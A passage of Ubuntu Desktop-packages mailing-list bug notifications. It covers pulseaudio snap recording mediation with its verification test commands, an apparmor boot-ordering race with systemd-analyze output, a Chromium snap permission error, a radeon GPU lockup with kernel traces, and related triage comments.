test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
I confirmed that https://people.canonical.com/~ubuntu-archive/proposed- migration/bionic/update_excuses.html shows no autopkgtest regression for bionic. I also ran through the TEST CASE for this bug and bionic passed. Marking verification-done-bionic. ** Tags removed: verification-failed verification-failed-bionic ** Tags added: verification-done-bionic ** Tags added: verification-done -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Fix Committed Status in pulseaudio source package in Bionic: Fix Committed Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ sudo snap connect test-snapd-pulseaudio:pulseaudio $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge + $ sudo snap connect test-snapd-pulseaudio:pulseaudio $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 - interface not being connecting which is unrelated to mediation. x11 is + interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav &&
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Adding a snapd Ubuntu task, marking as In Progress and assigning to mvo since he is preparing a 20.04 upload. ** Also affects: snapd (Ubuntu) Importance: Undecided Status: New ** Changed in: snapd (Ubuntu Focal) Assignee: (unassigned) => Michael Vogt (mvo) ** Changed in: snapd (Ubuntu Focal) Status: New => In Progress ** Changed in: snapd (Ubuntu Focal) Importance: Undecided => High ** Changed in: snapd (Ubuntu Focal) Milestone: None => ubuntu-20.04 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in snapd: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in snapd package in Ubuntu: In Progress Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in snapd source package in Focal: In Progress Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Daniel, this is a different cause but same result: zfs-load-module.service (2ms) zfs-import-cache.service (8ms) zfs-import.target ... var-lib.mount (69ms) ... snap-multipass-1869.mount (1.358s) ... apparmor.service (279ms) ... In this case, apparmor correctly waited for var.lib.mount, but multipass started before apparmor.service completed. ** Also affects: snapd Importance: Undecided Status: New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in snapd: New Status in apparmor package in Ubuntu: Fix Released Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Daniel responded on irc and said after several reboots with the new apparmor, everything was fine on every boot (though his critical-chain has var.lib.mount listed). My attached systemd-analyze plot svg shows that apparmor.service is indeed starting after var.lib.mount on the VM where the critical-chain didn't show it or zfs. On irc Didier thought that critical-chain would only list the longest path to apparmor.service starting and may not show everything (the man page isn't clear on this point IMHO). Based on all of this, I'm going to tentatively mark the zsys task back to Invalid. If people continue to see this bug, we can reopen as necessary (in which case it might be a systemd task for not generating the mount units/requires/after correctly/in a race-free manner or it might indicate zfs initialization is perhaps slow and apparmor.service is starting before var.lib.mount is generated (and therefore RequiresMountsFor is satisfied. Or it is something else ;) ** Changed in: zsys (Ubuntu Focal) Status: New => Invalid -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in apparmor package in Ubuntu: Fix Released Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
All that said, Daniel and Jean-Baptiste, I installed 20.04 in a vm and tried to reproduce this and could not. The apparmor change was about correctness of the unit so I performed the upload, but I also hoped that it would address the issue you are seeing. I'm not certain it will. On one boot, prior to upgrading apparmor, I saw: $ sudo systemd-analyze critical-chain apparmor.service The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. apparmor.service +11.135s └─local-fs.target @4.376s └─zfs-mount.service @4.327s +48ms └─var-lib-dpkg.mount @4.188s +137ms └─var-lib.mount @3.883s +250ms └─zfs-import.target @3.829s └─zfs-import-cache.service @3.125s +704ms └─zfs-load-module.service @3.121s +2ms └─systemd-udev-settle.service @1.183s +1.937s └─systemd-udev-trigger.service @933ms +248ms └─systemd-udevd-kernel.socket @886ms └─system.slice @535ms └─-.slice @535ms Note that var-lib.mount is already listed. On reboot though (without updating apparmor), I see: $ sudo systemd-analyze critical-chain apparmor.service The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. apparmor.service +101ms └─local-fs.target @2.812s └─run-user-122.mount @5.172s └─swap.target @1.823s └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s Oddly, no zfs entries are listed apparently because local-fs.target isn't pulling them in: $ sudo systemd-analyze critical-chain local-fs.target The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. local-fs.target @2.812s └─run-user-122.mount @5.172s └─swap.target @1.823s └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s Looking at var-lib.mount, I see zfs is in there: $ sudo systemd-analyze critical-chain var-lib.mount The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. var-lib.mount +179ms └─zfs-import.target @2.248s └─zfs-import-cache.service @1.845s +402ms └─zfs-load-module.service @1.840s +2ms └─systemd-udev-settle.service @692ms +1.143s └─systemd-udev-trigger.service @524ms +167ms └─systemd-udevd-kernel.socket @494ms └─system.slice @357ms └─-.slice @357ms So why after a reboot did the dependencies change and drop the /var/lib entry from local-fs.target? I then upgraded apparmor to have the RequiresMountsFor /var/lib/snapd/apparmor/profiles, rebooted and saw no difference: $ sudo systemd-analyze critical-chain apparmor.service The time when unit became active or started is printed after the "@" character. The time the unit took to start is printed after the "+" character. apparmor.service +222ms └─local-fs.target @2.562s └─run-user-122.mount @4.834s └─swap.target @1.687s └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.663s +24ms └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.662s ** Changed in: zsys (Ubuntu Focal) Status: Invalid => New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in apparmor package in Ubuntu: Fix Released Status in zsys package in Ubuntu: New Status in apparmor source package in Focal: Fix Released Status in zsys source package in Focal: New Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kern
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: snapd Status: In Progress => Fix Released ** Changed in: snapd (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Fix Released Status in snapd: Fix Released Status in apparmor package in Ubuntu: In Progress Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: Fix Released Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: apparmor Status: In Progress => Fix Released ** Also affects: apparmor (Ubuntu) Importance: Undecided Status: New ** Changed in: apparmor (Ubuntu) Importance: Undecided => Medium ** Changed in: apparmor (Ubuntu) Status: New => In Progress ** Changed in: apparmor (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Fix Released Status in snapd: In Progress Status in apparmor package in Ubuntu: In Progress Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Reassigning the snapd task to apparmor in Ubuntu since it has a patch to rc.apparmor.functions to look for /var/lib/snapd/apparmor/profiles but does not add it to RequiresMountsFor. ** Project changed: snapd => apparmor ** Changed in: apparmor Status: Confirmed => In Progress ** Changed in: apparmor Importance: Critical => Undecided ** Changed in: apparmor Status: In Progress => Invalid ** Also affects: apparmor (Ubuntu) Importance: Undecided Status: New ** Changed in: apparmor (Ubuntu Focal) Status: New => In Progress ** Changed in: apparmor (Ubuntu Focal) Importance: Undecided => Critical ** Changed in: apparmor (Ubuntu Focal) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in apparmor package in Ubuntu: In Progress Status in zsys package in Ubuntu: Confirmed Status in apparmor source package in Focal: In Progress Status in zsys source package in Focal: Confirmed Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1863390] Re: GPU lockup ring 0 stalled for more than X msec
After happening every day for a week, this hasn't happened again since I logged this bug. I also disabled Firefox WebRender so maybe that was a contributor. I'll re-open if I can provide any useful data. ** Changed in: xserver-xorg-video-ati (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1863390 Title: GPU lockup ring 0 stalled for more than X msec Status in xserver-xorg-video-ati package in Ubuntu: Incomplete Bug description: Since the update: xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic; which resulted from: https://bugs.launchpad.net/fedora/+source/xserver-xorg-video- ati/+bug/1841718 I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH. Sometimes dmesg ends up full of this message repeating over and over: radeon :01:00.0: ring 0 stalled for more than 24040msec radeon :01:00.0: GPU lockup (current fence id 0x9e44 last fence id 0x9e49 on ring 0) I sometimes get a few GPU soft reset which seem to fail in drm(?): radeon :01:00.0: Saved 110839 dwords of commands on ring 0. radeon :01:00.0: GPU softreset: 0x0008 ... radeon :01:00.0: Wait for MC idle timedout ! radeon :01:00.0: Wait for MC idle timedout ! [drm] PCIE GART of 1024M enabled (table at 0x00162000). radeon :01:00.0: WB enabled radeon :01:00.0: fence driver on ring 0 use gpu addr 0x4c00 and cpu addr 0x725651ad radeon :01:00.0: fence driver on ring 3 use gpu addr 0x4c0c and cpu addr 0xc3678ed8 radeon :01:00.0: fence driver on ring 5 use gpu addr 0x00072118 and cpu addr 0xdbd9e01b [drm:r600_ring_test [radeon]] *ERROR* radeon: ring 0 test failed (scratch(0x8504)=0xCAFEDEAD) [drm:evergreen_resume [radeon]] *ERROR* evergreen startup failed on resume Even if the above reset doesn't happen, this freeze always results in a unable to handle page fault" BUG in radeon_ring_backup, entered from various call paths, eg: BUG: unable to handle page fault for address: bc2d80574ffc ... Oops: [#1] SMP PTI CPU: 2 PID: 11243 Comm: kworker/2:1H Not tainted 5.5.0-050500-generic #202001262030 Workqueue: radeon-crtc radeon_flip_work_func [radeon] RIP: 0010:radeon_ring_backup+0xc9/0x140 [radeon] Call Trace: radeon_gpu_reset+0xc3/0x2f0 [radeon] radeon_flip_work_func+0x1f3/0x250 [radeon] ? __schedule+0x2e0/0x760 process_one_work+0x1b5/0x370 worker_thread+0x50/0x3d0 kthread+0x104/0x140 ? process_one_work+0x370/0x370 ? kthread_park+0x90/0x90 ret_from_fork+0x35/0x40 or: BUG: unable to handle page fault for address: c03901000ffc ... Oops: [#1] SMP PTI CPU: 3 PID: 2227 Comm: compton Not tainted 5.3.0-28-generic #30~18.04.1-Ubuntu RIP: 0010:radeon_ring_backup+0xd3/0x140 [radeon] Call Trace: radeon_gpu_reset+0xb9/0x340 [radeon] ? dma_fence_wait_timeout+0x48/0x110 ? reservation_object_wait_timeout_rcu+0x19d/0x340 radeon_gem_handle_lockup.part.4+0xe/0x20 [radeon] radeon_gem_wait_idle_ioctl+0xa6/0x110 [radeon] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] drm_ioctl_kernel+0xb0/0x100 [drm] drm_ioctl+0x389/0x450 [drm] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 radeon_drm_ioctl+0x4f/0x80 [radeon] do_vfs_ioctl+0xa9/0x640 ? __schedule+0x2b0/0x670 ksys_ioctl+0x75/0x80 __x64_sys_ioctl+0x1a/0x20 do_syscall_64+0x5a/0x130 entry_SYSCALL_64_after_hwframe+0x44/0xa9 I've tried both 5.3.0-28-generic and 5.5.0-050500-generic from kernel- ppa but that made no difference. It appears to be a bug in radeon. Nothing specific makes this happen, just regular usage with a compositing window manager. I'm not playing games or particularly exercising the GPU. The last two times I was just reading in web browser. It's also happened in the middle of the night while I was asleep. Sometimes I have a few days uptime, sometimes it happens in less than 24 hours from boot. This never happened before the radeon update mentioned on the first line. I'll attach two files of dmesg output. As per https://wiki.ubuntu.com/X/Troubleshooting/Freeze I've installed and started apport for next time it happens. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+subscriptions --
[Desktop-packages] [Bug 1285444] Re: Login Successful, Desktop Never Loads
I'm Not 100% sure it's the same issue but there are many similarities to the original issue. My issue only happens after after I try to wake the laptop from sleep. What I've been encountering: 1. Boot computer, boot proceeds normally, can log-in, all is good. 2. Suspend laptop 3. On wake, just see the pink "Ubuntu 19.10" background. Cursor works and can be moved around, can click on upper right tool bar menu (with battery/wifi/etc) but nothing else seems to work if I click on items. Looks like wifi connection is successful. 4. Switching TTY with ctrl+alt+F1 works andthen a normal login screen appears where I can successfully log in. 5. Sometimes (but not always) I'm prompted for password saying, "Authentication required to refresh system repositories". I'm happy to open up a new bug if that makes more sense and these issues are unrelated. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to at-spi2-core in Ubuntu. https://bugs.launchpad.net/bugs/1285444 Title: Login Successful, Desktop Never Loads Status in at-spi2-core package in Ubuntu: Triaged Bug description: Here is what I encounter 1. Boot computer, boot proceeds normally 2. Reach standard Ubuntu login screen, nothing seems to be amiss 3. Enter user name and password 4. Login disappears, just see the pink "Ubuntu 14.04" background The desktop never loads, not even after ~30 minutes. The launcher never appears, and the Desktop background never changes to the user- configured background. Other features: * Cursor works fine, it can be moved around the screen * No error messages pop up * ALT+F1 etc. can be used to switch to different TTYs; all files on the system appear to be intact * Print screen button works (I will upload a screen shot when I get a chance to copy it onto a USB drive) * Hitting power button pops up a window prompting the user to decide whether to shut down * CTRL+ALT+DELETE prompts the user to log out * Desktop does not load on any user accounts, including the guest account To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/at-spi2-core/+bug/1285444/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1864127] Re: apparmor denies ~/snap/chromium/ writes
Seth, I suspect if you stop the snap and restart it, these errors will go away. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1864127 Title: apparmor denies ~/snap/chromium/ writes Status in chromium-browser package in Ubuntu: New Bug description: Hello, on focal with chromium from the snap package running I see a constant stream of apparmor denials: Feb 21 00:20:55 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:20:55 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:20:55 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:20:55 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PROCTITLE 